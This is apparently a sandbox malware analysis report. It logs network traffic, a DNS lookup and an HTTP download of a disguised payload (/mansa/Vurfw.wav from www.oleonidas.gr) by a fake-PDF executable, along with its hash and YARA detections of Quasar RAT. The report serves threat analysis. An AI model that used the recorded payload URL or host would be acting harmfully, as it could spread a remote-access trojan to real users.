Nov 18, 2024 16:23:11.846518040 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.880095005 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.880242109 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.900856972 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.901099920 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.901333094 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.901411057 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.949223995 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.949420929 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.963720083 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.963859081 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.964114904 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.964185953 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.965125084 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.965198040 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.965544939 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.965610027 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:11.966080904 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:11.966197014 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.019906998 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.020083904 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.020361900 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.020432949 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.104638100 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.104732037 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.104744911 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.104756117 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.104801893 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.105247021 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.105310917 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.105941057 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.106004000 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.106190920 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.106255054 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.106903076 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.106966972 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.118213892 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.118309021 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.139065981 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.139182091 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.223637104 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.223820925 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.223907948 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.223932981 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.223994017 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.224184990 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.224256992 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.224615097 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.224690914 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.225325108 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.225397110 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.225605965 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.225681067 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.225936890 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.226005077 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.239165068 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.239258051 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.264381886 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.264457941 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.264755011 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.264813900 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.342812061 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.342904091 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.343122959 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.343197107 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.343611002 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.343698025 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.344127893 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.344192028 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.344638109 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.344696999 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.345320940 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.345474005 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.345643044 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.345711946 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.383626938 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.383713961 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.384032011 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.384089947 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.465368986 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.465486050 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.466506004 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.466579914 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.468801022 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.468863964 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.469000101 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.469038963 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.469057083 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.469069004 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.469094038 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.469120026 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.469135046 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.469182968 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.469192028 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.469196081 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.469218969 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.469234943 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.469286919 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.469290972 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.469326973 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.503681898 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.503779888 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.503961086 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.504028082 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.504244089 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.504308939 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.585712910 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.585978031 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.586092949 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.586158991 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.586164951 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.586172104 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.586205006 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.586215973 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.586225033 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.586270094 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.586744070 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.586815119 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.587604046 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.587656975 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.587676048 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.587678909 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.587707043 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.587724924 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.596586943 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.596705914 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.623076916 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.623182058 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.623430967 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.623495102 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.703866005 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.704008102 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.704394102 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.704466105 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.704987049 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.705063105 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.705512047 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.705586910 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.705662966 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.705727100 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.706459999 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.706530094 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.706927061 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.706993103 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.708390951 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.708441019 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.708468914 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.708477020 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.708489895 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.708522081 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.747164965 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.747334003 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.747493982 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.747555971 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.786612034 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.786782026 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.827878952 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.828012943 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.828320980 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.828386068 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.828979015 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.829024076 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.829049110 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.829057932 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.829075098 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.829098940 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.829876900 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.829948902 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.830785990 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.830854893 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.831643105 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.831708908 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.832171917 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.832247972 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.866605043 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.866755009 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.866791010 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.866842031 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.867070913 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.867141962 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.943121910 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.943212986 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.946634054 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.946737051 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.947082043 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.947141886 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.947453976 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.947516918 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.947788954 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.947848082 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.948070049 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.948131084 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.948455095 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.948504925 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.948718071 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.948776960 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.949326038 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.949383020 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.960179090 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.960254908 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.985763073 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.985847950 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:12.986217976 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:12.986282110 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:13.100176096 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:13.100307941 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:13.100604057 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:13.100660086 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:13.100693941 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:13.100702047 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:13.100716114 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:13.100753069 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:13.101337910 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:13.101408958 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:13.102022886 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:13.102092981 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:13.102097988 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:13.102154016 CET  49704        443          192.168.2.5    185.78.221.73
Nov 18, 2024 16:23:13.102937937 CET  443          49704        185.78.221.73  192.168.2.5
Nov 18, 2024 16:23:13.103002071 CET  443          49704        185.78.221.73  192.168.2.5
                                                                              Nov 18, 2024 16:23:13.103007078 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.103015900 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.103111982 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.103837967 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.103893042 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.103907108 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.103914976 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.103940010 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.103960037 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.108658075 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.108731985 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.108974934 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.109040022 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.109405041 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.109472036 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.219527960 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.219674110 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.219960928 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.220026970 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.220305920 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.220357895 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.220367908 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.220421076 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.221000910 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.221060991 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.221577883 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.221641064 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.222245932 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.222284079 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.222306013 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.222313881 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.222338915 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.222357988 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.223238945 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.223303080 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.223309994 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.223330021 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.223378897 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.224036932 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.224107027 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.227871895 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.227952003 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.228254080 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.228311062 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.228317976 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.228368044 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.338557005 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.338826895 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.338848114 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.338865042 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.338913918 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.339008093 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.339068890 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.339600086 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.339667082 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.340131998 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.340193987 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.340538025 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.340593100 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.340904951 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.340960026 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.341629028 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.341686964 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.341694117 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.341711044 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.341737032 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.341751099 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.341758013 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.341792107 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.342551947 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.342613935 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.347084999 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.347156048 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.347357988 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.347415924 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.347580910 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.347630024 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.347634077 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.347664118 CET44349704185.78.221.73192.168.2.5
                                                                              Nov 18, 2024 16:23:13.347707987 CET49704443192.168.2.5185.78.221.73
                                                                              Nov 18, 2024 16:23:13.352832079 CET49704443192.168.2.5185.78.221.73
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 18, 2024 16:23:06.456506014 CET | 56380 | 53 | 192.168.2.5 | 1.1.1.1
Nov 18, 2024 16:23:06.601373911 CET | 53 | 56380 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 18, 2024 16:23:06.456506014 CET | 192.168.2.5 | 1.1.1.1 | 0x1cbc | Standard query (0) | www.oleonidas.gr | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 18, 2024 16:23:06.601373911 CET | 1.1.1.1 | 192.168.2.5 | 0x1cbc | No error (0) | www.oleonidas.gr | oleonidas.gr | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 16:23:06.601373911 CET | 1.1.1.1 | 192.168.2.5 | 0x1cbc | No error (0) | oleonidas.gr | - | 185.78.221.73 | A (IP address) | IN (0x0001) | false
                                                                              • www.oleonidas.gr
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.78.221.73 | 443 | 7092 | C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 15:23:07 UTC | 81 | OUT | GET /mansa/Vurfw.wav HTTP/1.1
Host: www.oleonidas.gr
Connection: Keep-Alive
2024-11-18 15:23:07 UTC | 301 | IN | HTTP/1.1 200 OK
                                                                              Date: Mon, 18 Nov 2024 15:23:07 GMT
                                                                              Server: Apache
                                                                              Last-Modified: Mon, 18 Nov 2024 10:18:14 GMT
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 2124288
                                                                              Cache-Control: max-age=1209600
                                                                              Expires: Mon, 02 Dec 2024 15:23:07 GMT
                                                                              Vary: User-Agent
                                                                              Connection: close
                                                                              Content-Type: audio/x-wav
Target ID: 0
Start time: 10:23:04
Start date: 18/11/2024
Path: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Order88983273293729387293828PDF.exe"
Imagebase: 0x450000
File size: 1'484'800 bytes
MD5 hash: 9C23449EA828B1D7D4473AA70F86CAA8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                              • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2252532940.00000000068C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
